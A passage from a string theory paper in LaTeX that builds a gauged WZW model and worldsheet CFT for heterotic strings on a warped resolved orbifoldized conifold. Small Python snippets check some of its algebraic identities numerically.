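r = np.linspace(r1, r2, 400001)
y = 1.5 / (r * f2(r))
ratio_num = np.exp(np.sum(0.5 * (y[1:] + y[:-1]) * np.diff(r)))

# compare with the claimed closed form varrho = (r^8 - a^8)^(1/4)
ratio_exact = ((r2**8 - a**8) / (r1**8 - a**8))**0.25
print(ratio_num, ratio_exact)  # the two ratios agree
```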
In figure~\ref{kahlerpotfig} we plot the K\"ahler potential~(\ref{kahpot2}) for the asymptotically Ricci-flat
supergravity backgrounds given in figure~\ref{tab1}. We represent $\mathcal{K}$ only for small values of $r$, since for large
$r$ it universally behaves like $r^2$. One also verifies that, for small $r$, the analytic expression~(\ref{kahlerpot}) determined in the double-scaling limit fits perfectly
the numerical result.
\section{Gauged WZW model for the Warped Resolved Orbifoldized Conifold}
\label{gaugedsec}
The heterotic supergravity background obtained in the first section has been shown to admit a double scaling limit, isolating the throat region where an analytical solution can be found. The manifold is conformal to a cone over a non-Einstein $T^{1,1}/\mathbb{Z}_2$ base with a blown-up four-cycle, and features an asymptotically linear dilaton. The solution is parametrized by two 'shift vectors' $\vec{p}$ and $\vec{q}$ which determine the Abelian gauge bundle, and are orthogonal to each other. They are related to the \textsc{nsns} flux number $k$ as $k= \vec{p}^{\, 2} = \vec{q}^{\, 2}$.
These conditions, as well as the whole solution~(\ref{sol-nhl}), are valid in the large charge limit $\vec{p}^{\, 2} \gg 1$.
The presence of an asymptotic linear dilaton is a hint that an exact worldsheet \textsc{cft} description may exist. We will show in this section that it is indeed the case; for any
consistent choice of line bundle, a gauged \textsc{wzw} model, whose background fields are the same as the supergravity solution~(\ref{sol-nhl}), exists. Before dealing
with the details, let us stress some important points of the worldsheet construction:
\begin{enumerate}
\item In the blow-down limit $a\to 0$, the dependence of the metric on the radial coordinate simplifies,
factorizing the space into the (non-Einstein) $T^{1,1}$ base times the linear dilaton direction $r$.
\item The $T^{1,1}$ space is obtained as an asymmetrically gauged $SU(2)_k\times SU(2)_k$ \textsc{wzw}-model involving the
right-moving current algebra of the heterotic string.
\item In order to find the blown-up solution the linear dilaton needs to be replaced by an auxiliary $SL(2,\mathbb{R})_{k/2}$ \textsc{wzw}-model. It is gauged together with the
$SU(2)\times SU(2)$ factor, also in an asymmetric way.
\item The 'shift vectors' $\vec{p}$ and $\vec{q}$ define the embedding of both gaugings in the $Spin (32)/\mathbb{Z}_2$ lattice.
\item These two worldsheet gaugings are anomaly-free if $k = \vec{p}^{\, 2}=\vec{q}^{\, 2}-4$ and $\vec{p} \cdot \vec{q}=0$. These relations are exact in $\alpha'$.
\end{enumerate}
A detailed study of a related model, based on a warped Eguchi-Hanson space, is given in ref.~\cite{Carlevaro:2008qf}. We refer the reader to this work for more details on the techniques
used hereafter.
\subsection{Parameters of the gauging}\label{sec:param}
We consider an $\mathcal{N}=(1,0)$ \textsc{wzw} model for the group $SU(2)\times SU(2)\times SL(2,\mathbb{R})$,
whose element we denote by $(g_1,g_2,h)$. The associated levels of the $\mathcal{N}=1$ affine
simple algebras are respectively chosen to be\footnote{
It should be possible to generalize the construction starting with $SU(2)$ WZW models at non-equal levels.
Note also that the $SL(2,\mathbb{R})$ level does not need to be an integer.} $k$, $k$ and $k'$.
The left-moving central charge reads
\begin{equation}
c = 9 -\frac{12}{k}+\frac{6}{k'}\, ,
\end{equation}
therefore the choice $k'=k/2$ ensures that the central charge has the requested value $c=9$ for any $k$,
allowing one to take a small-curvature supergravity limit $k\to \infty$.
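The cancellation of the $1/k$ corrections for $k'=k/2$ is elementary, but can be checked exactly with rational arithmetic (a trivial sketch; the sampled levels are arbitrary):

```python
from fractions import Fraction

def central_charge(k, kprime):
    # left-moving central charge c = 9 - 12/k + 6/k'
    return 9 - Fraction(12, k) + Fraction(6, kprime)

# with k' = k/2 the 1/k corrections cancel exactly for any even level k
for k in (4, 16, 100, 4096):
    assert central_charge(k, k // 2) == 9
print("c = 9 for all tested levels")
```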
The first gauging, yielding a $T^{1,1}$ coset space with
a non-Einstein metric, acts on $SU(2)\times SU(2)$ as
\begin{equation}
\Big(g_1 (z,\bar z),g_2(z,\bar z)\Big) \longrightarrow \Big(e^{i\sigma_3\alpha (z,\bar z) }g_1 (z,\bar z),
e^{-i\sigma_3\alpha (z,\bar z) } g_2(z,\bar z)\Big)\,.
\label{gaugingI}
\end{equation}
This gauging is highly asymmetric, acting only by left multiplication. It has to
preserve $\mathcal{N}=(1,0)$ superconformal symmetry on the worldsheet, hence the worldsheet gauge fields
are minimally coupled to the left-moving worldsheet fermions of the super-\textsc{wzw} model.
In addition, the classical anomaly from this gauging
can be cancelled by minimally coupling some of the 32 right-moving worldsheet fermions of the heterotic worldsheet theory.
We introduce a sixteen-dimensional vector $\vec{p}$ that gives the embedding of the gauging in the $\mathfrak{so}(32)$ Cartan sub-algebra.
The anomaly cancellation condition gives the constraint\footnote{This condition involves the supersymmetric levels, as the gauging only acts
on the left-moving supersymmetric side in the $SU(2)_k \times SU(2)_k$ \textsc{wzw} model.}
\begin{equation}
k+k = 2 \vec{p}^{\, 2} \implies k = \vec{p}^{\, 2} \, .
\label{anomalyconstr0}
\end{equation}
On the left-hand side, the two factors correspond to the gauging in both $SU(2)_k$ models. We denote the components
of the worldsheet gauge field as $(A,\bar A)$.
The second gauging, leading to the resolved conifold, also acts on the $SL(2,\mathbb{R})_{k'}$ factor, along the
elliptic Cartan sub-algebra (which is time-like). Its action is given as follows:
\begin{multline}
\Big(g_1 (z,\bar z),g_2(z,\bar z),h(z,\bar z )\Big)\\ \longrightarrow\ \Big(e^{i\sigma_3\beta_1 (z,\bar z) }g_1 (z,\bar z),
e^{i\sigma_3\beta_1 (z,\bar z) } g_2(z,\bar z),e^{2i\sigma_3\beta_1 (z,\bar z) } h(z,\bar z) e^{2i\sigma_3\, \beta_2 (z,\bar z) }\Big)\,,
\label{gaugingII}
\end{multline}
and requires a pair of worldsheet gauge fields $\mathbf{B}=(B_1,B_2)$.
The left gauging, corresponding to the gauge field
$B_1$, is anomaly-free (without the need of right-moving fermions) for
\begin{equation}
2k = 4k' \, ,
\label{matchinglevels}
\end{equation}
which is satisfied by the choice $k'=k/2$ that was assumed above.\footnote{Note that the generator of the
$U(1)$ isometry in the $SL(2,\mathbb{R})$ group was chosen to be $2i\sigma_3$, which explains the factor of four in the right-hand side of equation~(\ref{matchinglevels}).}
The other gauging, corresponding to the gauge field $B_2$,
acts only on $SL(2,\mathbb{R})$, by right multiplication. This time the coupling to the worldsheet
gauge field need not be supersymmetric, as we are dealing with a $\mathcal{N}=(1,0)$ (heterotic) worldsheet.
The anomaly is again cancelled by minimally coupling worldsheet fermions from the gauge sector. Denoting the corresponding shift vector $\vec{q}$ one gets the condition
\begin{equation}
4\left(\frac{k}{2}+2\right) = 2\vec{q}^{\, 2} \implies k = \vec{q}^{\, 2}-4\, ,
\label{anomalyconstrI}
\end{equation}
which involves the bosonic level of $SL(2,\mathbb{R})$, as explained above; the constant term on the \textsc{rhs}
corresponds to the renormalization of the background fields by $\alpha'$ corrections, exact to all orders. In order to avoid the appearance of mixed anomalies in the full gauged \textsc{wzw} model,
one chooses the vectors defining the two gaugings to be orthogonal to each other
\begin{equation}
\vec{p} \cdot \vec{q} = 0 \, .
\label{anomalyconstrII}
\end{equation}
\subsection{Worldsheet action for the gauged WZW model}
The total action for the gauged \textsc{wzw} model defined above is given as follows:
\begin{equation}\label{Stot}
S_{\textsc{wzw}}(A,{\bf B}) = S_{SL(2,\mathbb{R})_{k/2+2}} + S_{SU(2)_{k-2},\, 1} + S_{SU(2)_{k-2},\, 2} + S_\text{gauge}(A,{\bf B}) + S_\text{Fer} (A,{\bf B})\, ,
\end{equation}
where the first three factors correspond to bosonic \textsc{wzw} actions, the fourth one to the bosonic terms involving the gauge fields and the
last one to the action of the minimally coupled fermions. As the general case of generic shift vectors $\vec{p}$ and $\vec{q}$
proves technically involved, we restrict, for simplicity, to the `minimal' solution of the
constraints~(\ref{anomalyconstrI},\ref{anomalyconstrII}) given by
\begin{equation}
\vec{p}=(2\ell,0^{15}) \ , \quad
\vec{q}=(0,2\ell,2,0^{13})\qquad \text{with} \quad \ell > 2\, ,
\label{minimalsol}
\end{equation}
implying in particular $k=4\ell^2$. This choice ensures that $k$ is even, which will later prove necessary when considering the orbifold.
The coset theory constructed with these shift vectors involves overall six right-moving Majorana-Weyl fermions ({\it i.e.} three complex fermions) out of the sixteen complex fermions participating in the fermionic representation of the $Spin(32)/\mathbb{Z}_2$ lattice.
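As a quick arithmetic sanity check, outside the main construction, one may verify that the shift vectors~(\ref{minimalsol}) indeed satisfy the anomaly conditions~(\ref{anomalyconstrI},\ref{anomalyconstrII}) with $k=4\ell^2$ even. A minimal Python sketch (the helper name is ours, purely illustrative):

```python
# Illustrative check of the 'minimal' shift vectors p = (2l, 0^15),
# q = (0, 2l, 2, 0^13) against the anomaly constraints quoted in the text:
# k = q.q - 4 and p.q = 0, implying k = 4 l^2 (even).

def check_minimal_solution(l):
    p = [2 * l] + [0] * 15
    q = [0, 2 * l, 2] + [0] * 13
    k = sum(qi * qi for qi in q) - 4                    # eq. (anomalyconstrI)
    assert sum(pi * qi for pi, qi in zip(p, q)) == 0    # eq. (anomalyconstrII)
    assert k == 4 * l * l and k % 2 == 0                # k = 4 l^2, even
    return k

# l > 2 as in eq. (minimalsol)
assert all(check_minimal_solution(l) == 4 * l * l for l in range(3, 10))
```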
We parametrize the group-valued worldsheet scalars $(g_1,g_2,h)\in SU(2)\times SU(2)\times SL(2,\mathbb{R})$ in terms of Euler angles as follows:
\begin{subequations}
\begin{align}
g_i &= e^{\frac{i}{2}\sigma_3 \psi_i} e^{\frac{1}{2}\sigma_1 \theta_i} e^{\frac{i}{2}\sigma_3 \phi_i}\ , \quad i=1,2\\
h&= e^{\frac{i}{2}\sigma_3 \phi_L} e^{\frac{1}{2}\sigma_1 \rho} e^{\frac{i}{2}\sigma_3 \phi_R}\,,\quad
\end{align}
\end{subequations}
where $\sigma_i$, $i=1,2,3$, are the usual Pauli matrices.
The action for the worldsheet gauge fields, including the couplings to the bosonic affine currents of the \textsc{wzw} models, is given by:\footnote{The left-moving purely bosonic $SU(2)\times SU(2)$ currents of the Cartan considered here are normalized as $j^3_1=i\sqrt{k-2}\,(\partial\psi_1+\cos\theta_1\,\partial\phi_1)$ and $j^3_2=i\sqrt{k-2}\,(\partial\psi_2+\cos\theta_2\,\partial\phi_2)$, while the $SL(2,\mathbb{R})$ left- and right-moving ones read $k^3=i\sqrt{\tfrac{k}{2}+2}\,(\partial\phi_L+\cosh\rho\,\partial\phi_R)$ and $\bar k^3=i\sqrt{\tfrac{k}{2}+2}\,(\bar{\partial}\phi_R+\cosh\rho\,\bar{\partial}\phi_L)$.}
\begin{multline}\label{S-gauge}
S_\text{gauge}(A,{\bf B}) = \frac{1}{8\pi} \int \mathrm{d}^2 z \,
\Big[2i\big(j^3_1 -j^3_2 \big)\bar A \,+\, 2(k-2) A\bar A
\,+\,2 B_1 i\bar k^3 +2 i\big(j^3_1 +j^3_2 + 2 k^3 \big)\bar B_2
\\ +\, 2(k-2) B_2\bar B_2
\,-\,\left(\tfrac k 2 + 2\right)\big( B_1\bar B_1 + 4 B_2\bar B_2 + 4 \cosh\rho\, B_1\bar B_2\big)
\Big] \,.
\end{multline}
The action for the worldsheet fermions comprises the left-moving Majorana-Weyl fermions coming
from the $SU(2)\times SU(2)\times SL(2,\mathbb{R})$ $\mathcal{N}=(1,0)$
super-\textsc{wzw} action,\footnote{We did not include the fermionic superpartners of the gauged currents, as they are gauged away.}
respectively ($\zeta^1, \zeta^2)$, ($\zeta^3,\zeta^4)$ and ($\zeta^5,\zeta^6)$, supplemented by six
right-moving Majorana-Weyl fermions coming from the $Spin(32)_1/\mathbb{Z}_2$ sector, that we denote $\bar\xi^a$, $a=1,\ldots,6$:
\begin{multline}\label{S-Fer}
S_{\text{Fer}} (A,{\bf B}) =
\frac{1}{4\pi} \int \mathrm{d}^2 z \,\Big[
\sum_{i=1}^6 \zeta^i \bar{\partial} \zeta^i
- 2 \big(\zeta^1 \zeta^2 - \zeta^3 \zeta^4 \big) \bar A \\
- 2 \big(\zeta^1 \zeta^2 + \zeta^3 \zeta^4 + 2\zeta^5 \zeta^6 \big) \bar{B}_2
+\sum_{a=1}^6 \bar{\xi}^a \partial \bar{\xi}^a - 2 \ell A \, \bar{\xi}^1\bar{\xi}^2
- 2 \bar B_1 \big(\bar{\xi}^3\bar{\xi}^4 + \ell\bar{\xi}^5\bar{\xi}^6\big)
\Big]\,.
\end{multline}
Note in particular that both actions (\ref{S-gauge}) and (\ref{S-Fer}) are consistent with
the normalization of the gauge fields required by the particular form of the second (asymmetric)
gauging (\ref{gaugingII}).
\subsection{Background fields at lowest order in $\alpha'$}
Finding the background fields corresponding to a heterotic coset theory is in general subtler than for the usual bosonic
or type \textsc{ii} cosets, because of the worldsheet anomalies generated by the various pieces of the asymmetrically gauged
\textsc{wzw} model. In our analysis, we will closely follow the methods used in~\cite{Johnson:1994jw,Johnson:2004zq}.
A convenient way of computing the metric, Kalb-Ramond and gauge field backgrounds from a heterotic
gauged \textsc{wzw} model is to bosonize the fermions
before integrating out the gauge fields.
One eventually needs to refermionize the appropriate
scalars to recover a heterotic sigma-model in the standard
form, {\it i.e.} (see~\cite{Sen:1985eb,Hull:1985jv}):
\begin{multline}
S= \frac{1}{4\pi} \int\!\! \mathrm{d}^2 z\, \Big[ \tfrac{2}{\alpha'} (g_{ij} +\mathcal{B}_{ij}) \partial X^i \bar{\partial} X^j \\
+ g_{ij} \zeta^i \bar{\nabla} (\Omega_+) \zeta^j + \bar{\xi}^A \nabla(\mathcal{A})_{AB} \bar{\xi}^B
+\tfrac{1}{4} \mathcal{F}^{AB}_{ij} \bar{\xi}_A \bar{\xi}_B \zeta^i \zeta^j \Big]
\label{generic_sigma_action}
\end{multline}
where the worldsheet derivative $\bar{\nabla} (\Omega_+)$ is defined with respect to the spin connection
$\Omega_+$ with torsion and the derivative $\nabla (\mathcal{A})$
with respect to the space-time gauge connection $\mathcal{A}$.
The details of this bosonization-refermionization procedure for the coset under scrutiny are given in appendix~\ref{AppBoson}. At leading order in $\alpha'$ (or more precisely
at leading order in a $1/k$ expansion), after classically integrating out the gauge fields, we obtain the bosonic part of the total action as follows:
\begin{multline}\label{Sbos-final}
S_{\textsc{b}}= \frac{k}{8\pi} \int \mathrm{d}^2 z\,\left[ \frac{1}{2}\partial\rho \bar{\partial} \rho+
\partial\theta_1 \bar{\partial} \theta_1 + \partial\theta_2 \bar{\partial} \theta_2 + \sin^2\theta_1 \,\partial\phi_1 \bar{\partial} \phi_1+
\sin^2\theta_2\,\partial\phi_2 \bar{\partial} \phi_2\right. \\
+\tfrac{1}{2}\tanh^2\rho\,(\partial\psi+\cos\theta_1\,\partial\phi_1+\cos \theta_2\,\partial \phi_2 )(\bar{\partial}\psi+\cos\theta_1\,\bar{\partial}\phi_1+\cos \theta_2\,\bar{\partial} \phi_2 ) \\
\left. +\frac{1}{2}\big(\cos\theta_1\,\partial\phi_1+\cos \theta_2\,\partial\phi_2\big)\bar{\partial}\psi- \frac{1}{2}
\partial\psi \big(\cos\theta_1\,\bar{\partial}\phi_1+\cos \theta_2\,\bar{\partial}\phi_2\big) \right]\,,
\end{multline}
while the fermionic part of the action is given by
\begin{multline}\label{Sfer-final}
S_{\textsc{f}}= \frac{k}{4\pi} \int \mathrm{d}^2 z\,\Big[ \sum_{i=1}^{6}\zeta^i\bar{\partial}\zeta^i
+ (\bar\xi^1,\bar\xi^2)\big[ {\rm 1\kern-.28em I}_2\,\partial +(\cos\theta_1\, \partial\phi_1-\cos\theta_2\, \partial\phi_2)\,i\sigma^2\big]\left(\begin{matrix} \bar\xi^1\\ \bar\xi^2 \end{matrix}\right) \\
+ \bar\Xi^\top \left[ {\rm 1\kern-.28em I}_4\,\partial +\frac{\ell}{\cosh\rho}\big(\partial \psi+\cos\theta_1\, \partial\phi_1+\cos \theta_2\, \partial\phi_2 \big)\,i\sigma^2\otimes \left( \begin{matrix} 1 & 0 \\ 0 & \ell \end{matrix}\right)\right] \bar\Xi \\
- \tfrac{1}{\ell}\,\bar\xi^1\bar\xi^2\,\big(\zeta^1\zeta^2-\zeta^3\zeta^4\big) +\frac{1}{\ell^2\cosh\rho}\,
\big(\bar\xi^3\bar\xi^4+\ell\bar\xi^5\bar\xi^6\big) \big(\zeta^1\zeta^2+\zeta^3\zeta^4+2\zeta^5\zeta^6\big) \Big]\, ,
\end{multline}
with $\bar\Xi^\top=(\bar\xi^3,\bar\xi^4,\bar\xi^5,\bar\xi^6)$.
In addition, a non-trivial dilaton is produced by the integration of the worldsheet gauge fields
\begin{equation}
\Phi = \Phi_0 -\tfrac12\ln\cosh\rho\,.
\end{equation}
The background fields obtained above exactly correspond to the double-scaling limit of the supergravity solution~(\ref{sol-nhl}) for a particular choice of vectors $\vec{p}$ and $\vec{q}$, after the change of coordinate
\begin{equation}
\cosh \rho = (r/a)^4 = R^4\,.
\end{equation}
As noticed in section~\ref{sec:analytic}, the blow-up parameter, which is not part of the definition of the coset \textsc{cft}, is absorbed in the dilaton zero-mode. It is straightforward --~but cumbersome~-- to extend the computation to
a more generic choice of bundle. This would lead to the background fields reproducing the generic supergravity solution~(\ref{sol-nhl}).
In this section we have left aside the discussion of the necessary presence of a $\mathbb{Z}_2$ orbifold acting on the $T^{1,1}$ base of the conifold. Its important consequences will
be tackled below.
\section{Worldsheet Conformal Field Theory Analysis}
In this section we provide the algebraic construction of the worldsheet \textsc{cft} corresponding to the $\mathcal{N}=(1,0)$ gauged \textsc{wzw} model defined in section~\ref{gaugedsec}. We have shown previously that the non-linear sigma model with
the warped resolved orbifoldized conifold as target space is given by the asymmetric coset:
\begin{equation}
\frac{SL(2,\mathbb{R})_{k/2} \times\, \left(\text{\small \raisebox{-1mm}{$U(1)_\textsc{l}$}\! $\backslash$ \!\!\raisebox{1mm}{$SU(2)_k \times SU(2)_k$}}\right)}{U(1)_\textsc{l} \times U(1)_\textsc{r}} \,,
\label{cosetdef}
\end{equation}
which combines a left gauging of $SU(2) \times SU(2)$ with a pair of chiral gaugings which also involve the $SL(2,\mathbb{R})$ \textsc{wzw} model. In addition, the full worldsheet \textsc{cft} comprises
a flat $\mathbb{R}^{3,1}$ piece, the right-moving heterotic affine algebra and an $\mathcal{N}=(1,0)$ superghost system. We will see later on that the coset~(\ref{cosetdef}) has an enhanced worldsheet $\mathcal{N}=(2,0)$ superconformal symmetry, which allows us to achieve $\mathcal{N}=1$ target-space supersymmetry.
In the following, we split our algebraic analysis of the worldsheet \textsc{cft} for clarity's sake, dealing with the singular conifold case separately before moving on to the resolved geometry. This is prompted by the fact that the singular construction appears as a non-trivial building block of the `resolved' \textsc{cft}, as we shall see below.
\subsection{A \textsc{cft} for the $T^{1,1}$ coset space}
\label{sec:acft}
We begin by restricting our discussion to the \textsc{cft} underlying the non-Einstein $T^{1,1}$ base of the conifold, which is captured by the coset space $[SU(2)\times SU(2)]/U(1)$.
In addition, this space supports a gauge bundle specified by the vector of magnetic charges $\vec{p}$. The full quantum theory describing the throat region of heterotic strings on
the torsional {\it singular} conifold can then be constructed by tensoring this \textsc{cft} with $\mathbb{R}^{3,1}$, the heterotic current algebra and a linear dilaton $\mathbb{R}_\mathcal{Q}$ with background charge\footnote{In the near-brane regime of~(\ref{sol-ansatz}), the conformal factor
$H \sim Q_5/r^2$ cancels out the $r^2$ factor in front of the $T^{1,1}$ metric, hence the latter factorizes in the blow-down limit.}
\begin{equation}
\mathcal{Q}=\sqrt{\frac{4}{k}}\,.
\end{equation}
Focusing now on the $T^{1,1}$ space, we recall the action (\ref{gaugingI}) of the first gauging on the group element $(g_1,g_2)\in SU(2) \times SU(2)$, supplemented with an action on the left-moving fermions dictated by $\mathcal{N}=1$ worldsheet supersymmetry. As seen in section~\ref{gaugedsec}, the anomaly following from this gauging is compensated by a minimal coupling to the worldsheet fermions of the gauge sector of the heterotic string,
specified by the shift vector $\vec{p}$.
By algebraically solving the coset \textsc{cft} associated with this gauged \textsc{wzw} model, we are led to the following constraint on the zero-modes of the affine currents $J^{3}_{1,2}$ of the $SU(2) \times SU(2)$
Cartan subalgebra:\footnote{These are the total currents of
the $\mathcal{N}=1$ affine algebra, including contributions of the worldsheet fermion bilinears.}
\begin{equation}
\label{zeromodcond}
(J^3_1)_0-(J^{3}_2)_0 = \vec{p}\cdot \vec{Q}_\textsc{f}\, ,
\end{equation}
where $\vec{Q}_\textsc{f}$ denotes the $\mathfrak{so}(32)$ weight of a given state. The affine currents of the $\widehat{\mathfrak{so}(32)}$ algebra can be alternatively written in the fermionic or bosonic representation as
\begin{equation}
\bar{\jmath}^{i} (\bar z) = \bar{\xi}^{2i-1} \bar{\xi}^{2i} (\bar z) = \sqrt{\frac{2}{\alpha'}}\, \bar \partial X^i (\bar z)
\quad , \qquad i=1,\ldots,16 \,,
\label{cartanbosfer}
\end{equation}
and the components of $\vec{Q}_\textsc{f}$ can be identified with the corresponding fermion number (mod 2).
In order to explicitly solve the zero-mode constraint~(\ref{zeromodcond}) at the level of the one-loop partition function,
it is first convenient to decompose the left-moving supersymmetric $SU(2)$ characters in terms of the characters of an
$SU(2)/U(1)$ super-coset:\footnote{These super-cosets correspond to $\mathcal{N}=2$ minimal models. Some details about their characters $ C^j_m \oao{a}{b}$ are given in appendix~\ref{appchar}.}
\begin{equation}
\chi^j \vartheta \oao{a}{b} = \sum_{m \in \mathbb{Z}_{2k}} C^j_m \oao{a}{b} \Theta_{m,k}\, .
\end{equation}
Next, to isolate the linear combination of Cartan generators appearing in~(\ref{zeromodcond}),
one can combine the two theta-functions at level $k$ corresponding to the Cartan generators
of the two $\widehat{\mathfrak{su}(2)}_k$ algebras by
using the product formula:
\begin{equation}
\label{thetasum}
\Theta_{m_1,k}\Theta_{m_2,k} = \sum_{s \in \mathbb{Z}_2}
\Theta_{m_1-m_2+2ks,2k} \Theta_{m_1+m_2+2ks,2k}\, .
\end{equation}
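This product formula can be verified numerically with truncated theta series. Below is an illustrative Python sketch (not part of the construction), assuming the standard convention $\Theta_{m,k}(\tau)=\sum_{n\in\mathbb{Z}+\frac{m}{2k}}q^{kn^2}$ and evaluating at a real sample point $q$ for convergence:

```python
import math

# Truncated theta function, assuming the convention
# Theta_{m,k}(tau) = sum_{n in Z + m/2k} q^{k n^2} = sum_n q^((2kn+m)^2 / 4k).
def theta(m, k, q, N=40):
    return sum(q ** ((2 * k * n + m) ** 2 / (4 * k)) for n in range(-N, N + 1))

# Numerical check of the product formula (thetasum) at q = 0.3
def check_product_formula(m1, m2, k, q=0.3):
    lhs = theta(m1, k, q) * theta(m2, k, q)
    rhs = sum(theta(m1 - m2 + 2 * k * s, 2 * k, q)
              * theta(m1 + m2 + 2 * k * s, 2 * k, q) for s in (0, 1))
    return math.isclose(lhs, rhs, rel_tol=1e-10)

assert all(check_product_formula(m1, m2, 4)
           for m1 in range(8) for m2 in range(8))
```

The identity follows from splitting the double sum over $(n_1,n_2)$ according to the parity of $n_1\pm n_2$, which is what the sum over $s\in\mathbb{Z}_2$ keeps track of.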
Thus, the gauging yielding the $T^{1,1}$ base effectively `removes' the $U(1)$ corresponding to the first theta-function. For simplicity, we again limit ourselves to the same minimal choice
of shift vectors as in (\ref{minimalsol}), namely $\vec{p} = (2\ell,0^{15})$, $\ell \in \mathbb{Z}$, which by (\ref{anomalyconstr0}) implies\footnote{We will see later
that the evenness of $k$ is a necessary condition for the resolution of the conifold by a blown-up four-cycle.}
\begin{equation}
k=4\ell^2 \, .
\end{equation}
Then the gauging will involve only a single right-moving Weyl fermion.
Its contribution to the partition function is given by a standard fermionic theta-function:
\begin{equation}
\vartheta \oao{u}{v} (\tau ) = \sum_{N \in \mathbb{Z}} q^{\frac{1}{2}(N+\frac{u}{2})^2} e^{i\pi v(N+\frac{u}{2})}\, ,
\label{fermitheta}
\end{equation}
where $\oao{u}{v}$ denotes the spin structure on the torus. The solutions of the zero-mode constraint~(\ref{zeromodcond}) can
be obtained from the expressions~(\ref{thetasum}) and~(\ref{fermitheta}); this gives (see~\cite{Berglund:1995dv,Israel:2004vv} for simpler cosets of the same type):
\begin{equation}
m_1-m_2= 2\ell(2M+u) \quad , \qquad M \in \mathbb{Z}_{2\ell}\, .
\label{zeroconstr}
\end{equation}
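In other words, as $M$ runs over $\mathbb{Z}_{2\ell}$ and $u$ over $\mathbb{Z}_2$, the difference $m_1-m_2$ sweeps out precisely the multiples of $2\ell$ modulo $2k=8\ell^2$, each exactly once. A small enumeration sketch (illustrative only; the helper name is ours):

```python
# Illustrative enumeration: the solutions m1 - m2 = 2l(2M + u), with
# M in Z_{2l} and u in Z_2, are exactly the multiples of 2l modulo 2k = 8 l^2.
def solution_set(l):
    k = 4 * l * l
    return sorted({(2 * l * (2 * M + u)) % (2 * k)
                   for M in range(2 * l) for u in (0, 1)})

for l in (2, 3, 5):
    assert solution_set(l) == [2 * l * j for j in range(4 * l)]
```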
We are then left, for given $SU(2)$ spins $j_1$ and $j_2$, with contributions to the coset partition function of the form
\begin{equation}
\sum_{m_1 \in \mathbb{Z}_{8\ell^2}} C^{j_1}_{m_1} \oao{a}{b}\, \bar{\chi}^{j_1}\,
\sum_{M \in \mathbb{Z}_{2\ell}} e^{i\pi v (M+\tfrac{u}{2})}C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} \,\bar{\chi}^{j_2} \, \sum_{s \in \mathbb{Z}_2}
\Theta_{2m_1-2\ell(2M+u)+8\ell^2 s,8\ell^2}\,.
\end{equation}
One can in addition simplify this expression using the identity
\begin{equation}
\sum_{s \in \mathbb{Z}_2}
\Theta_{2m_1-2\ell(2M+u)+8\ell^2s,8\ell^2} = \Theta_{m_1-\ell(2M+u),2\ell^2}\, .
\end{equation}
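This resummation identity holds because the two shifted integer sums combine into a single sum over half-integers, lowering the level from $8\ell^2$ to $2\ell^2$. It can be checked numerically with truncated series; an illustrative sketch, again assuming the convention $\Theta_{m,k}(\tau)=\sum_{n\in\mathbb{Z}+\frac{m}{2k}}q^{kn^2}$:

```python
import math

# Truncated theta function, assuming the convention
# Theta_{m,k}(tau) = sum_{n in Z + m/2k} q^{k n^2}.
def theta(m, k, q, N=40):
    return sum(q ** ((2 * k * n + m) ** 2 / (4 * k)) for n in range(-N, N + 1))

# Check: sum_{s in Z_2} Theta_{2a + 8 l^2 s, 8 l^2} = Theta_{a, 2 l^2},
# with a = m1 - l(2M + u) in the notation of the text.
def check_resummation(a, l, q=0.3):
    lhs = sum(theta(2 * a + 8 * l * l * s, 8 * l * l, q) for s in (0, 1))
    return math.isclose(lhs, theta(a, 2 * l * l, q), rel_tol=1e-10)

assert all(check_resummation(a, l) for l in (2, 3) for a in range(-5, 6))
```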
Note that the coset partition function by itself cannot be modular invariant, since fermions from the gauge sector of the heterotic string were used in the coset construction.
\subsection{Heterotic strings on the singular conifold}
\label{sec:hetstr}
The full modular-invariant partition function for the {\it singular} torsional conifold case
can now be established by adding (in the light-cone gauge) the $\mathbb{R}^{2}\times \mathbb{R}_\mathcal{Q}$ contribution, together with the remaining gauge fermions.
Using the coset defined above, one then obtains the following one-loop amplitude:
\begin{multline}
\label{conepf}
Z (\tau ,\bar \tau) = \frac{1}{(4\pi \tau_2 \alpha')^{5/2}} \frac{1}{\eta^3 \bar \eta^3} \,
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}^2}{\eta^2}
\sum_{m_1 \in \mathbb{Z}_{2k}} \sum_{M \in \mathbb{Z}_{2\ell}}\,
\frac{1}{2}\sum_{u,v \in \mathbb{Z}_2} \frac{\Theta_{m_1-2\ell(M+u/2),2\ell^2}}{\eta} \, \times \\[4pt]
\times \, \sum_{2j_1,2j_2=0}^{k-2}
C^{j_1}_{m_1} \oao{a}{b}
C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} e^{i\pi v (M+\tfrac{u}{2})} \bar{\chi}^{j_1} \bar{\chi}^{j_2}
\,
\frac{\bar{\vartheta} \oao{u}{v}^{15}}{\bar{\eta}^{15}}\,.
\end{multline}
The terms on the second line correspond to the contribution of the $\mathbb{R}^2\times \mathbb{R}_\mathcal{Q} \times U(1)$ piece with the
associated left-moving worldsheet fermions. Their spin structure is given by $\oao{a}{b}$, with $a=0$ (resp. $a=1$) corresponding to the \textsc{ns} (resp. \textsc{r}) sector.
Again, the spin structure of the right-moving heterotic fermions for the
$Spin(32)/\mathbb{Z}_2$ lattice is denoted by $\oao{u}{v}$ (see the last term in this partition function). One may as well consider the $E_8\times E_8$ heterotic string theory, by changing the spin structure accordingly.
We notice that the full right-moving $SU(2)\times SU(2)$ affine symmetry, corresponding to the isometries of the $S^2 \times S^2$ part of the geometry, is preserved, while the surviving left-moving $U(1)$ current represents translations along the $S^1$ fiber. In the partition
function~(\ref{conepf}), the $U(1)$ charges are given by the argument of the theta-function at level $2\ell^2$. Later on, we will realize this $U(1)$ in terms of the canonically normalized free chiral boson $X_\textsc{l} (z)$.
\subsubsection*{Space-time supersymmetry}
The left-moving part of the \textsc{cft} constructed above, omitting the flat space piece, can be described as an orbifold of the superconformal theories:
\begin{equation}
\left[ \mathbb{R}_{1/\ell} \times U(1)_{2\ell^2}\right] \times \frac{SU(2)_k}{U(1)} \times \frac{SU(2)_k}{U(1)} \,.
\end{equation}
